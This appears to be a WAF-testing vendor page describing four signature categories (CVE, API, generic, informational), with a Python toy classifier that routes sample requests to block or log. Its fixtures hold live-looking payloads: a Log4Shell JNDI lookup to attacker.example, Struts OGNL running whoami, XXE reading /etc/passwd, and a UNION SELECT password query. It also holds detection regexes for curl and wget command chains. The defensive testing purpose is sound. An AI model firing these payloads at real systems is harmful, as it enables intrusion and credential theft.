Signature Testing – Web Exploit Sub-Classification

WAFScan tests your WAF’s ability to detect and respond to a wide range of signature-based web exploits, each classified by its specificity, purpose, and detection scope. These are divided into the following sub-categories:

1. CVE Exploits

  • Definition: These are signatures that directly match known Common Vulnerabilities and Exposures (CVEs) with a high or critical CVSS score.

  • Purpose: To ensure your WAF can block well-documented, real-world exploits.

  • Example: RCE or SQLi payloads tied to a named vulnerability, such as OGNL injection against Apache Struts, JNDI lookup strings for Log4Shell, or Drupalgeddon.

2. API Exploits

  • Definition: Signatures targeting API-specific attack surfaces, typically involving JSON, XML, or binary payloads.

  • Purpose: To test the WAF’s parsing of REST, GraphQL, and gRPC traffic (gRPC-Web when the client is a browser), including requests issued from client-side code via fetch() or XMLHttpRequest.

  • Example: Malformed JSON payloads, nested keys injection, and XML entity abuse.


3. Generic Exploits

  • Definition: Broad detection rules designed to catch unknown or emerging threats, often referred to as heuristic or overlapping signatures.

  • Purpose: To catch variations of known exploit techniques, including previously unseen (zero-day) attacks that reuse them, that do not map to a specific CVE.

  • Example: Suspicious command sequences, special character abuse in inputs, or obfuscated SQL/JS code.

4. Informational / User-Agent-Based

  • Definition: Low-risk but useful signatures based on known bad user agents, default admin URLs, or suspicious headers.

  • Purpose: Often used for threat intelligence, bot detection, or identifying scanning tools; because a user agent is trivially spoofed, these signatures usually log or rate-limit rather than block outright.

  • Example: Requests with user-agents like sqlmap, nmap, or URLs like /phpmyadmin.
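The four sub-categories above differ not only in what they match but in how a WAF should act on a hit: categories 1 to 3 are block-worthy, category 4 is usually log-only. The following is an added illustration of that split, not WAFScan’s code or rule set. The `Request` type, every rule name, the `MAX_JSON_DEPTH` limit and all sample requests are constructed for this example; the patterns are deliberately small stand-ins for the much larger signatures a real WAF ships.

```python
"""Toy signature sub-classifier mirroring the four WAFScan categories.

Added example, not WAFScan's code. Rule names, the Request type and every
sample request below are constructed for illustration.
"""
import json
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

MAX_JSON_DEPTH = 8  # assumed limit; real WAFs make this configurable


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: str = ""

    def text(self) -> str:
        """Request line (URL-decoded), raw headers and body as one string."""
        hdrs = "\n".join(f"{k}: {v}" for k, v in self.headers.items())
        return f"{self.method} {unquote(self.path)}\n{hdrs}\n{self.body}"


# Pattern rules: (category, rule name, regex). Constructed, not a real rule set.
RULES = [
    # 1. CVE exploits: each tied to one well-documented vulnerability
    ("cve", "log4shell-jndi-lookup", re.compile(r"\$\{\s*jndi\s*:", re.I)),
    ("cve", "struts-ognl-content-type", re.compile(r"^content-type:.*%\{", re.I | re.M)),
    # 3. Generic exploits: technique patterns not bound to a CVE
    ("generic", "sqli-union-select", re.compile(r"union(?:\s|/\*.*?\*/)+select", re.I)),
    ("generic", "os-command-chain", re.compile(r"[;&|`]\s*(?:id|whoami|cat|curl|wget)\b", re.I)),
    # 4. Informational: scanner fingerprints and default admin paths
    ("informational", "scanner-user-agent",
     re.compile(r"^user-agent:.*\b(?:sqlmap|nikto|nmap)\b", re.I | re.M)),
    ("informational", "default-admin-path", re.compile(r"^\w+ /phpmyadmin\b", re.M)),
]


def json_depth(obj, depth: int = 1) -> int:
    """Nesting depth of a parsed JSON document (a scalar counts as depth 1)."""
    if isinstance(obj, dict):
        return max((json_depth(v, depth + 1) for v in obj.values()), default=depth)
    if isinstance(obj, list):
        return max((json_depth(v, depth + 1) for v in obj), default=depth)
    return depth


def api_checks(req: Request) -> list:
    """2. API exploits: structural checks on JSON/XML bodies rather than regexes."""
    hits = []
    ctype = req.headers.get("Content-Type", "").lower()
    if "json" in ctype:
        try:
            doc = json.loads(req.body)
        except json.JSONDecodeError:
            hits.append("malformed-json")
        else:
            if json_depth(doc) > MAX_JSON_DEPTH:
                hits.append("excessive-json-nesting")
    if "xml" in ctype and re.search(r"<!ENTITY\b", req.body, re.I):
        hits.append("xml-entity-declaration")
    return hits


def classify(req: Request) -> dict:
    """Map a request to {category: [rule names]} for every signature it trips."""
    hits = {}
    text = req.text()
    for category, name, pattern in RULES:
        if pattern.search(text):
            hits.setdefault(category, []).append(name)
    for name in api_checks(req):
        hits.setdefault("api", []).append(name)
    return hits


def decide(hits: dict) -> str:
    """Block on exploit categories; informational-only traffic is logged."""
    if set(hits) & {"cve", "api", "generic"}:
        return "block"
    return "log" if "informational" in hits else "allow"


# Constructed sample traffic: one or two requests per sub-category plus a benign control.
SAMPLES = {
    "log4shell": Request("GET", "/login", {"User-Agent": "${jndi:ldap://attacker.example/a}"}),
    "struts_ognl": Request("POST", "/upload",
                           {"Content-Type": "%{(#_='multipart/form-data').(#cmd='whoami')}"}),
    "nested_json": Request("POST", "/api/v1/profile", {"Content-Type": "application/json"},
                           '{"k":' * 12 + "{}" + "}" * 12),
    "bad_json": Request("POST", "/api/v1/profile", {"Content-Type": "application/json"},
                        '{"user": "bob", }'),
    "xxe": Request("POST", "/api/v1/import", {"Content-Type": "text/xml"},
                   '<!DOCTYPE x [<!ENTITY e SYSTEM "file:///etc/passwd">]><x>&e;</x>'),
    "obf_sqli": Request("GET", "/products?id=1%27%20UNION/**/SELECT%20password%20FROM%20users"),
    "scanner": Request("GET", "/phpmyadmin/", {"User-Agent": "sqlmap/1.7#stable"}),
    "benign": Request("GET", "/index.html", {"User-Agent": "Mozilla/5.0"}),
}


def run_samples() -> dict:
    """Verdict per sample; categories 1-3 should block, category 4 should only log."""
    return {name: decide(classify(req)) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(f"{name:12} {decide(classify(req)):5} {classify(req)}")
```

Two design points carry over to real WAF testing. The API category is handled with a parser (depth limit, strict JSON decoding, entity-declaration check) rather than a regex, because that is what the page means by testing the WAF’s parsing capabilities: a WAF that only greps the body will miss a nested-key payload that looks harmless character by character. And the informational category never reaches `block` on its own, so a test suite for category 4 should assert on logging or rate-limiting rather than on a blocked response.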
